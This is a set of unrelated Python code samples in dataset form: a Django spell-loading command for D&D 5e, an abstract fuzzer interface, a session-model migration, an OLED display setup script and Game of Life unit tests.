len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n dice_size = re.findall('(?<=d)\\\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n s_throw = re.findall('[A-Z]\\\\w+(?= saving throw)', spell[\n 'description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n spell_entry.save()\n",
"step-4": "import re\nfrom django.core.management.base import BaseCommand\nfrom utils.spells import SPELLS\nfrom spells.models import Spell\nSPELL_SCHOOL = {'Abjuration': 'Abjuration', 'Conjuration': 'Conjuration',\n 'Divination': 'Divination', 'Enchantment': 'Enchantment', 'Evocation':\n 'Evocation', 'Illusion': 'Illusion', 'Necromancy': 'Necromancy',\n 'Transmutation': 'Transmutation'}\nCAST_TIME = {'1 Action': '1 Action', '1 Bonus Action': '1 Bonus Action',\n '1 Reaction': '1 Reaction', '1 Minute': '1 Minute', '10 Minutes':\n '10 Minutes', '1 Hour': '1 Hour', '8 Hours': '8 Hours', '12 Hours':\n '12 Hours', '24 Hours': '24 Hours', '1 Action or 8 Hours':\n '1 Action or 8 Hours'}\nSPELL_LEVELS = {'Cantrip': 'Cantrip', '1': '1st-level', '2': '2nd-level',\n '3': '3rd-level', '4': '4th-level', '5': '5th-level', '6': '6th-level',\n '7': '7th-level', '8': '8th-level', '9': '9th-level'}\n\n\nclass Command(BaseCommand):\n \"\"\"Command to populate the database with all spells for 5th Edition.\"\"\"\n help = (\n 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n )\n\n def handle(self, *args, **kwargs):\n for spell in SPELLS:\n spell_entry = Spell.objects.create(name=spell['name'], distance\n =spell['range'], ritual=spell['ritual'])\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title(\n ) + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])\n ):\n spell_entry.specific_materials += spell['components'][\n 'materials_needed'][i] + ', '\n if 'description' in spell.keys():\n 
spell_entry.description = spell['description']\n dice_number = re.findall('\\\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n dice_size = re.findall('(?<=d)\\\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n s_throw = re.findall('[A-Z]\\\\w+(?= saving throw)', spell[\n 'description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n spell_entry.save()\n",
"step-5": "# python imports\nimport re\n\n# django imports\nfrom django.core.management.base import BaseCommand\n\n# module level imports\nfrom utils.spells import SPELLS\nfrom spells.models import Spell\n\nSPELL_SCHOOL = {\n 'Abjuration': 'Abjuration',\n 'Conjuration': 'Conjuration',\n 'Divination': 'Divination',\n 'Enchantment': 'Enchantment',\n 'Evocation': 'Evocation',\n 'Illusion': 'Illusion',\n 'Necromancy': 'Necromancy',\n 'Transmutation': 'Transmutation',\n}\n\nCAST_TIME = {\n '1 Action': '1 Action',\n '1 Bonus Action': '1 Bonus Action',\n '1 Reaction': '1 Reaction',\n '1 Minute': '1 Minute',\n '10 Minutes': '10 Minutes',\n '1 Hour': '1 Hour',\n '8 Hours': '8 Hours',\n '12 Hours': '12 Hours',\n '24 Hours': '24 Hours',\n '1 Action or 8 Hours': '1 Action or 8 Hours',\n}\n\nSPELL_LEVELS = {\n 'Cantrip': 'Cantrip',\n '1': '1st-level',\n '2': '2nd-level',\n '3': '3rd-level',\n '4': '4th-level',\n '5': '5th-level',\n '6': '6th-level',\n '7': '7th-level',\n '8': '8th-level',\n '9': '9th-level',\n}\n\n\nclass Command(BaseCommand):\n \"\"\"Command to populate the database with all spells for 5th Edition.\"\"\"\n\n # args\n help = 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n\n def handle(self, *args, **kwargs):\n\n for spell in SPELLS:\n spell_entry = Spell.objects.create(\n name=spell['name'],\n distance=spell['range'],\n ritual=spell['ritual'],\n )\n\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title() + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])):\n 
spell_entry.specific_materials += spell['components']['materials_needed'][i] + ', '\n\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n\n dice_number = re.findall(r'\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n\n dice_size = re.findall(r'(?<=d)\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n\n s_throw = re.findall(r\"[A-Z]\\w+(?= saving throw)\", spell['description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n\n spell_entry.save()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
__author__ = 'susperius'
"""
Abstract class used to implement own fuzzers
"""
class Fuzzer:
    """Abstract interface that concrete fuzzers must implement.

    Every method below is a stub that raises ``NotImplementedError``;
    subclasses are expected to override them all.  ``NAME`` and
    ``CONFIG_PARAMS`` are class-level metadata filled in per implementation.
    """

    NAME = []
    CONFIG_PARAMS = []

    @classmethod
    def from_list(cls, params):
        """Construct a fuzzer from a flat parameter list."""
        raise NotImplementedError("ABSTRACT METHOD")

    @property
    def prng_state(self):
        """Current state of the fuzzer's pseudo-random number generator."""
        raise NotImplementedError("ABSTRACT METHOD")

    @property
    def file_type(self):
        """Type of the test-case files this fuzzer produces."""
        raise NotImplementedError("ABSTRACT METHOD")

    def set_seed(self, seed):
        """Seed the fuzzer's PRNG."""
        raise NotImplementedError("ABSTRACT METHOD")

    def set_state(self, state):
        """Restore a previously captured PRNG state."""
        raise NotImplementedError("ABSTRACT METHOD")

    def fuzz(self):
        """Run one fuzzing step."""
        raise NotImplementedError("ABSTRACT METHOD")

    def create_testcases(self, count, directory):
        """Write ``count`` test cases into ``directory``."""
        raise NotImplementedError("ABSTRACT METHOD")
|
normal
|
{
"blob_id": "aa2a268143856d8f33b1aaf24f4e28ffd95cab01",
"index": 4658,
"step-1": "<mask token>\n\n\nclass Fuzzer:\n <mask token>\n <mask token>\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def prng_state(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def fuzz(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_state(self, state):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_seed(self, seed):\n raise NotImplementedError('ABSTRACT METHOD')\n <mask token>\n\n @property\n def file_type(self):\n raise NotImplementedError('ABSTRACT METHOD')\n",
"step-2": "<mask token>\n\n\nclass Fuzzer:\n <mask token>\n <mask token>\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def prng_state(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def fuzz(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_state(self, state):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_seed(self, seed):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def create_testcases(self, count, directory):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def file_type(self):\n raise NotImplementedError('ABSTRACT METHOD')\n",
"step-3": "<mask token>\n\n\nclass Fuzzer:\n NAME = []\n CONFIG_PARAMS = []\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def prng_state(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def fuzz(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_state(self, state):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_seed(self, seed):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def create_testcases(self, count, directory):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def file_type(self):\n raise NotImplementedError('ABSTRACT METHOD')\n",
"step-4": "__author__ = 'susperius'\n<mask token>\n\n\nclass Fuzzer:\n NAME = []\n CONFIG_PARAMS = []\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def prng_state(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def fuzz(self):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_state(self, state):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def set_seed(self, seed):\n raise NotImplementedError('ABSTRACT METHOD')\n\n def create_testcases(self, count, directory):\n raise NotImplementedError('ABSTRACT METHOD')\n\n @property\n def file_type(self):\n raise NotImplementedError('ABSTRACT METHOD')\n",
"step-5": "__author__ = 'susperius'\n\n\"\"\"\nAbstract class used to implement own fuzzers\n\"\"\"\n\nclass Fuzzer:\n NAME = []\n CONFIG_PARAMS = []\n\n @classmethod\n def from_list(cls, params):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n @property\n def prng_state(self):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n def fuzz(self):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n def set_state(self, state):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n def set_seed(self, seed):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n def create_testcases(self, count, directory):\n raise NotImplementedError(\"ABSTRACT METHOD\")\n\n @property\n def file_type(self):\n raise NotImplementedError(\"ABSTRACT METHOD\")",
"step-ids": [
7,
8,
9,
10,
11
]
}
|
[
7,
8,
9,
10,
11
] |
# Generated by Django 2.1.3 on 2019-01-06 06:53
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: create the ``Session`` model.

    A ``Session`` ties a unique, non-editable token to a user, with an
    optional description and created / last-seen timestamps.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Session',
            fields=[
                ('id', models.AutoField(
                    auto_created=True, primary_key=True,
                    serialize=False, verbose_name='ID')),
                ('token', models.CharField(
                    editable=False, max_length=64, unique=True)),
                ('description', models.CharField(blank=True, max_length=512)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('last_seen_at', models.DateTimeField(
                    blank=True, editable=False, null=True)),
                ('user', models.ForeignKey(
                    on_delete=django.db.models.deletion.CASCADE,
                    to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
normal
|
{
"blob_id": "a91d42764fa14111afca4551edd6c889903ed9bd",
"index": 8056,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [migrations.CreateModel(name='Session', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('token', models.CharField(editable=\n False, max_length=64, unique=True)), ('description', models.\n CharField(blank=True, max_length=512)), ('created_at', models.\n DateTimeField(auto_now_add=True)), ('last_seen_at', models.\n DateTimeField(blank=True, editable=False, null=True)), ('user',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))])]\n",
"step-4": "import django.db.models.deletion\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [migrations.CreateModel(name='Session', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('token', models.CharField(editable=\n False, max_length=64, unique=True)), ('description', models.\n CharField(blank=True, max_length=512)), ('created_at', models.\n DateTimeField(auto_now_add=True)), ('last_seen_at', models.\n DateTimeField(blank=True, editable=False, null=True)), ('user',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))])]\n",
"step-5": "# Generated by Django 2.1.3 on 2019-01-06 06:53\n\nimport django.db.models.deletion\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"Session\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"token\", models.CharField(editable=False, max_length=64, unique=True)),\n (\"description\", models.CharField(blank=True, max_length=512)),\n (\"created_at\", models.DateTimeField(auto_now_add=True)),\n (\n \"last_seen_at\",\n models.DateTimeField(blank=True, editable=False, null=True),\n ),\n (\n \"user\",\n models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n to=settings.AUTH_USER_MODEL,\n ),\n ),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Bring-up script for an SSD1306 OLED over hardware SPI: configure the bus
# pins, initialise the driver, and blank the panel.  The commented-out
# variants below show the other supported display sizes and bus options.
import Adafruit_GPIO.SPI as SPI
import Adafruit_SSD1306
# Raspberry Pi pin configuration:
RST = 24  # reset pin
# Note the following are only used with SPI:
DC = 23  # data/command select pin
SPI_PORT = 0
SPI_DEVICE = 0
# Beaglebone Black pin configuration:
# RST = 'P9_12'
# Note the following are only used with SPI:
# DC = 'P9_15'
# SPI_PORT = 1
# SPI_DEVICE = 0
# 128x32 display with hardware I2C:
#disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)
# 128x64 display with hardware I2C:
#disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST)
# Note you can change the I2C address by passing an i2c_address parameter like:
# disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3C)
# Alternatively you can specify an explicit I2C bus number, for example
# with the 128x32 display you would use:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, i2c_bus=2)
# 128x32 display with hardware SPI:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))
# 128x64 display with hardware SPI (the active configuration):
disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))
# Alternatively you can specify a software SPI implementation by providing
# digital GPIO pin numbers for all the required display pins. For example
# on a Raspberry Pi with the 128x32 display you might use:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, sclk=18, din=25, cs=22)
# Initialize library.
disp.begin()
# Clear display: zero the in-memory buffer, then push it to the panel.
disp.clear()
disp.display()
|
normal
|
{
"blob_id": "d8cbed25f4c97be5a74a6e1f097fcb9fa9439a9a",
"index": 8160,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndisp.begin()\ndisp.clear()\ndisp.display()\n",
"step-3": "<mask token>\nRST = 24\nDC = 23\nSPI_PORT = 0\nSPI_DEVICE = 0\ndisp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(\n SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))\ndisp.begin()\ndisp.clear()\ndisp.display()\n",
"step-4": "import Adafruit_GPIO.SPI as SPI\nimport Adafruit_SSD1306\nRST = 24\nDC = 23\nSPI_PORT = 0\nSPI_DEVICE = 0\ndisp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(\n SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))\ndisp.begin()\ndisp.clear()\ndisp.display()\n",
"step-5": "import Adafruit_GPIO.SPI as SPI\nimport Adafruit_SSD1306\n\n# Raspberry Pi pin configuration:\nRST = 24\n# Note the following are only used with SPI:\nDC = 23\nSPI_PORT = 0\nSPI_DEVICE = 0\n\n# Beaglebone Black pin configuration:\n# RST = 'P9_12'\n# Note the following are only used with SPI:\n# DC = 'P9_15'\n# SPI_PORT = 1\n# SPI_DEVICE = 0\n\n# 128x32 display with hardware I2C:\n#disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)\n\n# 128x64 display with hardware I2C:\n#disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST)\n\n# Note you can change the I2C address by passing an i2c_address parameter like:\n# disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3C)\n\n# Alternatively you can specify an explicit I2C bus number, for example\n# with the 128x32 display you would use:\n# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, i2c_bus=2)\n\n# 128x32 display with hardware SPI:\n# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))\n\n# 128x64 display with hardware SPI:\ndisp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))\n\n# Alternatively you can specify a software SPI implementation by providing\n# digital GPIO pin numbers for all the required display pins. For example\n# on a Raspberry Pi with the 128x32 display you might use:\n# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, sclk=18, din=25, cs=22)\n\n# Initialize library.\ndisp.begin()\n\n# Clear display.\ndisp.clear()\ndisp.display()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,
ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,
ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])
def test_simple_update2(self):
init_config = [(0, 0), (0, 1), (0, 2)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])
<|reserved_special_token_0|>
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_test_board(size):
board = Board(size)
board[0, 0].state = ALIVE
board[0, 1].state = ALIVE
board[2, 1].state = ALIVE
return board
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,
ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])
def test_simple_update2(self):
init_config = [(0, 0), (0, 1), (0, 2)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])
def test_overpopulation(self):
init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 1], [1, 0, 1], [1, 1, 1]])
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from game_of_life.board import Board
from game_of_life.cell import Cell, ALIVE, DEAD
def create_test_board(size):
board = Board(size)
board[0, 0].state = ALIVE
board[0, 1].state = ALIVE
board[2, 1].state = ALIVE
return board
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [None, None,
ALIVE, ALIVE, DEAD, ALIVE, DEAD, None])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 0], [1, 1, 0], [0, 0, 0]])
def test_simple_update2(self):
init_config = [(0, 0), (0, 1), (0, 2)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[0, 1, 0], [0, 1, 0], [0, 0, 0]])
def test_overpopulation(self):
init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [[1, 1, 1], [1, 0, 1], [1, 1, 1]])
class CellTest(unittest.TestCase):
def test_is_alive(self):
alive_cell = Cell(ALIVE)
self.assertTrue(alive_cell.is_alive)
dead_cell = Cell(DEAD)
self.assertFalse(dead_cell.is_alive)
def test_create_life(self):
cell = Cell(DEAD)
neighbours = [1, 1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours))
def test_will_not_be_born(self):
cell = Cell(DEAD)
neighbours = [1, 1, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
neighbours = [1, 1, 1, 1, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_stay_alive(self):
cell = Cell(ALIVE)
neighbours2 = [1, 1, 0, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours2))
neighbours3 = [1, 1, 1, 0, 0, 0, None, None]
self.assertTrue(cell.will_survive(neighbours3))
def test_will_not_survive_overpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 1, 1, 1, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
def test_will_not_survive_underpopulation(self):
cell = Cell(ALIVE)
neighbours = [1, 0, 0, 0, 0, 0, 0]
self.assertFalse(cell.will_survive(neighbours))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from game_of_life.board import Board
from game_of_life.cell import Cell, ALIVE, DEAD
def create_test_board(size):
board = Board(size)
board[0, 0].state = ALIVE
board[0, 1].state = ALIVE
board[2, 1].state = ALIVE
return board
class BoardTests(unittest.TestCase):
def test_get_neighbours(self):
board = create_test_board(3)
self.assertListEqual(board.get_neighbour_states(1, 0), [
None, None, ALIVE,
ALIVE, DEAD,
ALIVE, DEAD, None
])
def test_simple_update(self):
alive_cells = [(0, 0), (1, 1), (0, 1)]
board = Board(3)
board.set_alive_cells(alive_cells)
board.update()
states = board.list_of_values
self.assertListEqual(states, [
[1, 1, 0],
[1, 1, 0],
[0, 0, 0]
])
def test_simple_update2(self):
init_config = [(0, 0), (0, 1), (0, 2)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [
[0, 1, 0],
[0, 1, 0],
[0, 0, 0]
])
def test_overpopulation(self):
init_config = [(0, 1), (1, 0), (1, 1), (1, 2), (2, 1)]
board = Board(3)
board.set_alive_cells(init_config)
board.update()
states = board.list_of_values
self.assertListEqual(states, [
[1, 1, 1],
